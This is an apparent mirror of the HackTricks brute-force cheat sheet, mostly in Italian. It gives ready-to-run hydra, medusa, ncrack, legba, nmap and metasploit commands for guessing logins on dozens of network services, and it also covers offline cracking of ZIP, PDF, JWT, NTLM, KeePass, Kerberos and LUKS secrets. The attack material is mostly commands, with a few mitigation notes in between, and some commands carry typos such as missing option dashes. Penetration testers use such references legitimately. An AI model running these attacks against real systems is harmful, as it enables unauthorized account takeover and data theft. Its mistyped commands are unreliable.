Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-16 22:18:27 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/generic-methodologies-and-resources/brute-force.md

50 KiB
Raw Blame History

Brute Force - CheatSheet


Usa Trickest per costruire facilmente e automatizzare flussi di lavoro supportati dagli strumenti della community più avanzati al mondo.
Ottieni l'accesso oggi:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Impara l'hacking di AWS da zero a eroe con htARTE (Esperto Red Team AWS di HackTricks)!

Altri modi per supportare HackTricks:

Credenziali Predefinite

Cerca su Google le credenziali predefinite della tecnologia che viene utilizzata, o prova questi link:

Crea i tuoi Dizionari

Trova il maggior numero possibile di informazioni sul target e genera un dizionario personalizzato. Strumenti che potrebbero aiutare:

Crunch

crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)

@ Lower case alpha characters
, Upper case alpha characters
% Numeric characters
^ Special characters including spac
crunch 6 8 -t ,@@^^%%

Cewl

cewl example.com -m 5 -w words.txt

CUPP

Genera password basate sulla tua conoscenza della vittima (nomi, date...)

python3 cupp.py -h

Wister

Uno strumento generatore di liste di parole, che ti consente di fornire un insieme di parole, offrendoti la possibilità di creare molteplici variazioni dalle parole fornite, creando una lista di parole unica e ideale da utilizzare in relazione a un obiettivo specifico.

python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst

__          _______  _____ _______ ______ _____
\ \        / /_   _|/ ____|__   __|  ____|  __ \
\ \  /\  / /  | | | (___    | |  | |__  | |__) |
\ \/  \/ /   | |  \___ \   | |  |  __| |  _  /
\  /\  /   _| |_ ____) |  | |  | |____| | \ \
\/  \/   |_____|_____/   |_|  |______|_|  \_\

Version 1.0.3                    Cycurity

Generating wordlist...
[########################################] 100%
Generated 67885 lines.

Finished in 0.920s.

pydictor

Liste di parole


Usa Trickest per creare facilmente e automatizzare flussi di lavoro supportati dagli strumenti della comunità più avanzati al mondo.
Ottieni l'accesso oggi:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Servizi

Ordinati in ordine alfabetico per nome del servizio.

AFP

nmap -p 548 --script afp-brute <IP>
msf> use auxiliary/scanner/afp/afp_login
msf> set BLANK_PASSWORDS true
msf> set USER_AS_PASS true
msf> set PASS_FILE <PATH_PASSWDS>
msf> set USER_FILE <PATH_USERS>
msf> run

AJP

Il protocollo AJP (Apache JServ Protocol) è un protocollo di comunicazione che viene utilizzato tipicamente tra un server web e un server di applicazioni. È possibile sfruttare vulnerabilità nel protocollo AJP per eseguire attacchi di tipo brute force al fine di ottenere accesso non autorizzato al server di applicazioni.

nmap --script ajp-brute -p 8009 <IP>

AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace)

legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl]

Cassandra

Cassandra è un database distribuito altamente scalabile che consente di archiviare grandi quantità di dati senza punti di singolo errore. È possibile eseguire attacchi di forza bruta contro Cassandra per tentare di indovinare le credenziali di accesso. Questo può essere fatto utilizzando strumenti come Hydra o Metasploit.

nmap --script cassandra-brute -p 9160 <IP>
# legba ScyllaDB / Apache Casandra
legba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042

CouchDB

CouchDB è un database NoSQL che può essere soggetto a attacchi di forza bruta per compromettere le credenziali di accesso. Gli hacker possono utilizzare strumenti automatizzati per tentare di indovinare le password e accedere illegalmente al database. Per proteggere CouchDB da attacchi di forza bruta, è consigliabile implementare politiche di password robuste, limitare il numero di tentativi di accesso e monitorare attentamente l'attività sospetta.

msf> use auxiliary/scanner/couchdb/couchdb_login
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /

Registro Docker

hydra -L /usr/share/brutex/wordlists/simple-users.txt  -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/

Elasticsearch

Elasticsearch è un motore di ricerca e analisi distribuito e open source progettato per gestire dati strutturati e non strutturati. Elasticsearch utilizza un'interfaccia RESTful e JSON per indicizzare e cercare i dati. È ampiamente utilizzato per la ricerca full-text, monitoraggio delle applicazioni, analisi dei log e molto altro. Elasticsearch è altamente scalabile e può essere utilizzato per implementare ricerche complesse e analisi dei dati in tempo reale.

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /

FTP

Il Brute Force è una tecnica comunemente utilizzata per violare le password di accesso a un server FTP. Consiste nel tentativo di accesso ripetuto utilizzando diverse combinazioni di nomi utente e password fino a quando non si trova la combinazione corretta. Questo può essere fatto manualmente o utilizzando strumenti automatizzati come Hydra o Medusa. È importante notare che il Brute Force è considerato un attacco rudimentale e rumoroso, quindi è consigliabile utilizzarlo con cautela e solo con l'autorizzazione esplicita del proprietario del sistema.

hydra -l root -P passwords.txt [-t 32] <IP> ftp
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
legba ftp --username admin --password wordlists/passwords.txt --target localhost:21

Brute Force Generico HTTP

WFuzz

Autenticazione di Base HTTP

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
# Use https-get mode for https
medusa -h <IP> -u <username> -P  <passwords.txt> -M  http -m DIR:/path/to/auth -T 10
legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/

HTTP - NTLM

legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/

HTTP - Invio modulo

In un attacco di forza bruta contro un modulo di invio HTTP POST, un attaccante invia una grande quantità di richieste POST al server, cercando di indovinare le credenziali di accesso o di inviare dati dannosi. Questo tipo di attacco può essere efficace contro moduli di accesso, moduli di invio di commenti o qualsiasi altro modulo che accetti dati tramite richieste POST HTTP.

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb  http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for https

Per https devi cambiare da "http-post-form" a "https-post-form"

HTTP - CMS -- (W)ordpress, (J)oomla o (D)rupal o (M)oodle

cmsmap -f W/J/D/M -u a -p a https://wordpress.com
# Check also https://github.com/evilsocket/legba/wiki/HTTP

IMAP

IMAP (Internet Message Access Protocol) is a widely used protocol for email retrieval. It operates over port 143 (or port 993 for secure SSL/TLS connections). Brute-forcing IMAP credentials involves trying different username and password combinations until the correct one is found. This can be done using tools like Hydra or Medusa. It is important to note that brute-forcing is a noisy attack and may trigger account lockouts or alerts.

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
nmap -sV --script imap-brute -p <PORT> <IP>
legba imap --username user --password data/passwords.txt --target localhost:993

IRC

Brute Force

Brute force attacks on IRC accounts involve attempting to log in to an account by systematically trying all possible combinations of usernames and passwords until the correct one is found. This method is time-consuming but can be effective if the credentials are weak. Automated tools can be used to speed up the process.

nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>

ISCSI

nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>

JWT

JSON Web Token

#hashcat
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt

#https://github.com/Sjord/jwtcrack
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt

#John
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256

#https://github.com/ticarpi/jwt_tool
python3 jwt_tool.py -d wordlists.txt <JWT token>

#https://github.com/brendan-rius/c-jwt-cracker
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8

#https://github.com/mazen160/jwt-pwn
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt

#https://github.com/lmammino/jwt-cracker
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6

LDAP

LDAP (Lightweight Directory Access Protocol) è un protocollo standard aperto utilizzato per accedere e mantenere servizi di directory distribuiti su una rete IP.

nmap --script ldap-brute -p 389 <IP>
legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-match

MQTT

MQTT (Message Queuing Telemetry Transport) è un protocollo di messaggistica leggero progettato per dispositivi con limitate risorse di rete.

ncrack mqtt://127.0.0.1 --user test P /root/Desktop/pass.txt -v
legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt

Mongo

Brute force attacks against MongoDB databases are common due to the default configuration allowing unauthenticated access. Attackers can use tools like Hydra or Metasploit to perform brute force attacks against MongoDB databases. It is important to always secure your MongoDB instances by setting strong passwords and enabling authentication to prevent unauthorized access.

nmap -sV --script mongodb-brute -n -p 27017 <IP>
use auxiliary/scanner/mongodb/mongodb_login
legba mongodb --target localhost:27017 --username root --password data/passwords.txt

MSSQL

Brute Force

Il metodo di attacco brute force è comunemente utilizzato per indovinare le credenziali di accesso a un server MSSQL. Questo attacco coinvolge la generazione di molteplici combinazioni di username e password fino a quando non viene trovata la corretta. È importante notare che l'uso di attacchi brute force può essere illegale e dannoso per il server di destinazione.

legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433

MySQL

Brute Force

Brute force attacks against MySQL databases can be carried out using tools like Hydra or SQLMap. These tools can attempt to log in to MySQL databases by trying different combinations of usernames and passwords until the correct one is found. It is important to note that brute force attacks can be time-consuming and may trigger account lockouts or other security measures if too many failed login attempts are made.

# hydra
hydra -L usernames.txt -P pass.txt <IP> mysql

# msfconsole
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false

# medusa
medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql

#Legba
legba mysql --username root --password wordlists/passwords.txt --target localhost:3306

OracleSQL

Brute Force

Brute force attacks are commonly used to crack passwords by systematically trying all possible combinations until the correct one is found. In the context of OracleSQL, brute force attacks can be used to guess usernames and passwords to gain unauthorized access to databases.

Prevention

To prevent brute force attacks in OracleSQL, consider implementing the following measures:

  1. Strong Passwords: Enforce the use of strong, complex passwords that are difficult to guess.
  2. Account Lockout Policy: Implement an account lockout policy that locks out an account after a certain number of failed login attempts.
  3. Monitoring: Regularly monitor login attempts and look for any suspicious activity.
  4. Two-Factor Authentication: Implement two-factor authentication for an added layer of security.
  5. Limit Login Attempts: Limit the number of login attempts to prevent multiple failed attempts.

By implementing these preventive measures, you can significantly reduce the risk of brute force attacks in OracleSQL.

patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017

./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt

#msf1
msf> use admin/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>

#msf2, this option uses nmap and it fails sometimes for some reason
msf> use scanner/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORTS 1521
msf> set SID <SID>

#for some reason nmap fails sometimes when executing this script
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>

legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt

Per utilizzare oracle_login con patator è necessario installare:

pip3 install cx_Oracle --upgrade

Forza bruta hash OracleSQL offline (versioni 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, e 11.2.0.3):

nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30

POP

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V

# Insecure
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:110

# SSL
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:995 --pop3-ssl

PostgreSQL

Brute Force

Brute force attacks against PostgreSQL databases involve attempting to guess usernames and passwords to gain unauthorized access. This can be done using automated tools that systematically try all possible combinations of usernames and passwords until the correct one is found.

Protection

To protect against brute force attacks on PostgreSQL databases, consider implementing the following measures:

  1. Strong Passwords: Enforce the use of complex and unique passwords for database accounts.

  2. Account Lockout Policy: Implement an account lockout policy that locks out users after a certain number of failed login attempts.

  3. Monitoring: Monitor database logs for any unusual login patterns or multiple failed login attempts.

  4. Two-Factor Authentication: Implement two-factor authentication for an added layer of security.

  5. Firewall Rules: Restrict access to the database server by allowing only specific IP addresses or ranges.

  6. Regular Audits: Conduct regular security audits to identify and address any vulnerabilities in the database system.

hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt <IP> postgres
medusa -h <IP> U /root/Desktop/user.txt P /root/Desktop/pass.txt M postgres
ncrack v U /root/Desktop/user.txt P /root/Desktop/pass.txt <IP>:5432
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432

PPTP

Puoi scaricare il pacchetto .deb da installare da https://http.kali.org/pool/main/t/thc-pptp-bruter/

sudo dpkg -i thc-pptp-bruter*.deb #Install the package
cat rockyou.txt | thc-pptp-bruter u <Username> <IP>

RDP

RDP (Remote Desktop Protocol) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. RDP brute force attacks involve trying multiple username and password combinations to gain unauthorized access to a remote system. These attacks can be mitigated by implementing account lockout policies, using complex passwords, and monitoring for multiple failed login attempts.

ncrack -vv --user <User> -P pwds.txt rdp://<IP>
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
legba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain <RDP_DOMAIN>] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon]

Redis

Redis è un popolare database in memoria open-source che può essere soggetto a attacchi di forza bruta. Gli attaccanti possono tentare di indovinare le credenziali di accesso utilizzando elenchi predefiniti di password comuni o eseguendo attacchi di dizionario utilizzando strumenti come Hydra o Medusa. È importante proteggere adeguatamente le istanze di Redis utilizzando password complesse e configurazioni di sicurezza adeguate per prevenire con successo gli attacchi di forza bruta.

msf> use auxiliary/scanner/redis/redis_login
nmap --script redis-brute -p 6379 <IP>
hydra P /path/pass.txt redis://<IP>:<PORT> # 6379 is the default
legba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl]

Rexec

Rexec is a simple service that allows users to execute commands on a remote system. It is often used for testing purposes and can be a target for brute force attacks.

hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V

Rlogin

Rlogin è un protocollo di rete che consente a un utente di accedere a un altro host su una rete. Questo protocollo è vulnerabile agli attacchi di forza bruta, in cui un attaccante tenta di indovinare le credenziali di accesso provando diverse combinazioni di username e password. Per proteggere un sistema da tali attacchi, è consigliabile utilizzare password complesse e implementare misure di sicurezza aggiuntive come il blocco dell'account dopo un numero specifico di tentativi falliti.

hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V

Rsh

Rsh (Remote Shell) is a protocol that allows a user to execute commands on a remote system. It is often targeted during brute-force attacks due to its weak authentication mechanisms.

hydra -L <Username_list> rsh://<Victim_IP> -v -V

http://pentestmonkey.net/tools/misc/rsh-grind

Rsync

nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>

RTSP

Real Time Streaming Protocol (RTSP) è un protocollo di rete utilizzato per il controllo di flussi multimediali continui, come l'audio o il video. RTSP può essere soggetto a attacchi di forza bruta per tentare di indovinare le credenziali di accesso a un server RTSP.

hydra -l root -P passwords.txt <IP> rtsp

SFTP

legba sftp --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22

SNMP

msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp

SMB

Il protocollo SMB (Server Message Block) è un protocollo di rete utilizzato principalmente per fornire condivisione di file, stampa e comunicazioni tra nodi di rete. È comunemente utilizzato in ambienti Windows e può essere soggetto a attacchi di forza bruta per tentare di indovinare le credenziali di accesso.

nmap --script smb-brute -p 445 <IP>
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
legba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup <SMB_WORKGROUP>] [--smb-share <SMB_SHARE>]

SMTP

Il Simple Mail Transfer Protocol (SMTP) è un protocollo standard per l'invio di email su una rete.

hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
legba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism <mech>]

SOCKS

SOCKS stands for Socket Secure and is an internet protocol that routes network packets between a client and a server through a proxy server. It can be used as a method for brute-forcing login credentials by routing the login attempts through a SOCKS proxy to avoid detection.

nmap  -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt
# With alternative address
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080

SQL Server

SQL Server

#Use the NetBIOS name of the machine as domain
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> U /root/Desktop/user.txt P /root/Desktop/pass.txt M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT

SSH

SSH (Secure Shell) è un protocollo crittografico che consente di stabilire connessioni sicure su una rete non sicura. È comunemente utilizzato per accedere in remoto a server e dispositivi di rete.

hydra -l root -P passwords.txt [-t 32] <IP> ssh
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
legba ssh --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22

Chiavi SSH deboli / PRNG prevedibile di Debian

Alcuni sistemi presentano difetti noti nel seme casuale utilizzato per generare materiale crittografico. Ciò può risultare in uno spazio delle chiavi drasticamente ridotto che può essere forzato con strumenti come snowdroppe/ssh-keybrute. Set pre-generati di chiavi deboli sono disponibili anche come g0tmi1k/debian-ssh.

STOMP (ActiveMQ, RabbitMQ, HornetQ e OpenMQ)

Il protocollo di testo STOMP è un protocollo di messaggistica ampiamente utilizzato che consente una comunicazione e interazione senza soluzione di continuità con servizi di code di messaggi popolari come RabbitMQ, ActiveMQ, HornetQ e OpenMQ. Fornisce un approccio standardizzato ed efficiente per lo scambio di messaggi e l'esecuzione di varie operazioni di messaggistica.

legba stomp --target localhost:61613 --username admin --password data/passwords.txt

Telnet

Telnet è un protocollo di rete che consente di stabilire una connessione remota con un dispositivo tramite la rete. Questo protocollo è spesso utilizzato per l'amministrazione remota dei dispositivi di rete.

hydra -l root -P passwords.txt [-t 32] <IP> telnet
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet

legba telnet \
--username admin \
--password wordlists/passwords.txt \
--target localhost:23 \
--telnet-user-prompt "login: " \
--telnet-pass-prompt "Password: " \
--telnet-prompt ":~$ " \
--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin

VNC

hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt -s <PORT> <IP> vnc
medusa -h <IP> u root -P /root/Desktop/pass.txt M vnc
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt t 1 x retry:fgep!='Authentication failure' --max-retries 0 x quit:code=0
use auxiliary/scanner/vnc/vnc_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
legba vnc --target localhost:5901 --password data/passwords.txt

#Metasploit
use auxiliary/scanner/vnc/vnc_login
set RHOSTS <ip>
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst

Winrm

Winrm (Windows Remote Management) è un protocollo di gestione remota sviluppato da Microsoft che consente la comunicazione tra computer su una rete. È possibile utilizzare attacchi di forza bruta per tentare di indovinare le credenziali di accesso e ottenere l'accesso non autorizzato al sistema target.

crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt


Usa Trickest per creare facilmente e automatizzare flussi di lavoro supportati dagli strumenti della community più avanzati al mondo.
Ottieni l'accesso oggi:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Locale

Database di cracking online

Controlla questo prima di provare a eseguire un attacco di forza bruta su un hash.

ZIP

#sudo apt-get install fcrackzip
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip

zip2john file.zip > zip.john
john zip.john

#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack

Attacco zip con testo in chiaro conosciuto

È necessario conoscere il testo in chiaro (o parte del testo in chiaro) di un file contenuto all'interno dello zip crittografato. È possibile controllare i nomi dei file e le dimensioni dei file contenuti all'interno di uno zip crittografato eseguendo: 7z l encrypted.zip
Scarica bkcrack dalla pagina dei rilasci.

# You need to create a zip file containing only the file that is inside the encrypted zip
zip plaintext.zip plaintext.file

./bkcrack -C <encrypted.zip> -c <plaintext.file> -P <plaintext.zip> -p <plaintext.file>
# Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18
# With that key you can create a new zip file with the content of encrypted.zip
# but with a different pass that you set (so you can decrypt it)
./bkcrack -C <encrypted.zip> -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd
unzip unlocked.zip #User new_pwd as password

7z

7z

cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z

#Download and install requirements for 7z2john
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.john

PDF

Brute Force

Brute force attacks consist of systematically checking all possible keys or passwords until the correct one is found. This method is usually very time-consuming and resource-intensive, but it can be effective against weak passwords or encryption keys.

Tools

There are several tools available for conducting brute force attacks, such as Hydra, Medusa, and John the Ripper. These tools can be customized to target specific protocols or services, making them versatile and powerful for penetration testing purposes.

Mitigation

To mitigate brute force attacks, it is essential to enforce strong password policies, implement account lockout mechanisms, and use multi-factor authentication. Additionally, monitoring and logging failed login attempts can help detect and respond to brute force attacks in a timely manner.

apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
#pdf2john didn't work well, john didn't know which hash type was
# To permanently decrypt the pdf
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf

Password Proprietario PDF

Per crackare una password del proprietario di un PDF, controlla qui: https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/

JWT

git clone https://github.com/Sjord/jwtcrack.git
cd jwtcrack

#Bruteforce using crackjwt.py
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt

#Bruteforce using john
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john #It does not work with Kali-John

Crack di NTLM

Format:USUARIO:ID:HASH_LM:HASH_NT:::
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot

Keepass

sudo apt-get install -y kpcli #Install keepass tools like keepass2john
keepass2john file.kdbx > hash #The keepass is only using password
keepass2john -k <file-password> file.kdbx > hash # The keepass is also using a file as a needed credential
#The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john
john --wordlist=/usr/share/wordlists/rockyou.txt hash

Keberoasting

Keberoasting è una tecnica che sfrutta debolezze nella gestione delle password per estrarre hash di password da servizi come Kerberos. Una volta ottenuti gli hash, possono essere decrittati offline per ottenere le password in chiaro.

john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

Immagine di Lucks

Metodo 1

Installazione: https://github.com/glv2/bruteforce-luks

bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt

Metodo 2

cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
hashcat -m 14600 -a 0 luckshash  wordlists/rockyou.txt
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt

Un altro tutorial su Luks BF: http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1

Mysql

#John hash format
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d

Chiave privata PGP/GPG

gpg2john private_pgp.key #This will generate the hash and save it in a file
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash

Cisco

Chiave Master DPAPI

Usa https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py e poi john

Colonna Protetta da Password di Open Office

Se hai un file xlsx con una colonna protetta da una password puoi rimuoverla:

  • Caricalo su Google Drive e la password verrà rimossa automaticamente
  • Per rimuoverla manualmente:
unzip file.xlsx
grep -R "sheetProtection" ./*
# Find something like: <sheetProtection algorithmName="SHA-512"
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
# Remove that line and rezip the file
zip -r file.xls .

Certificati PFX

# From https://github.com/Ridter/p12tool
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
# From https://github.com/crackpkcs12/crackpkcs12
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx


